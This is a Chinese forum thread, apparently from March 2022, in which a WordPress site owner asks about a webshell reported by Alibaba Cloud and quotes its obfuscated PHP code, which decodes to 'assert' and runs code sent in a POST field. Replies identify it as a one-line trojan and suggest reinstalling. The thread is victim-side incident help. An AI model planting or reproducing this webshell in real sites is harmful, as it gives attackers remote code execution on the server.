今天突然收到阿里云发来的短信,说我的 WP 网站有后门( Webshell )文件待处理,打开一看,目录是 /wp-content/uploads/2022/03/1.php
好家伙,直接伪装了图片上传了了一个脚本文件,脚本文件如下:
<?php error_reporting(0);set_time_limit(0);$a=base64_decode("Y"."X"."N"."z"."Z"."X"."J"."0");$a(@${"_P"."O"."S"."T"}[xw]);?>
现在一打开网站就是输出 phpinfo 信息,不太懂这段代码具体做了啥,如何清除这段木马?
 |
1
eason1874 Mar 12, 2022  2
就是一句话木马,通过 assert 允许 POST 接收的代码
你连这都看不懂的话,排除也难了,搞不好 WP 其他文件也已经被植入了。重装吧,WP 文件全部替换成新下载的,主题和插件能替换的也替换掉,自己改过的那些就逐个文件排查 |
 |
2
mineralsalt Mar 12, 2022
base64 解码 : assert
|
Select Language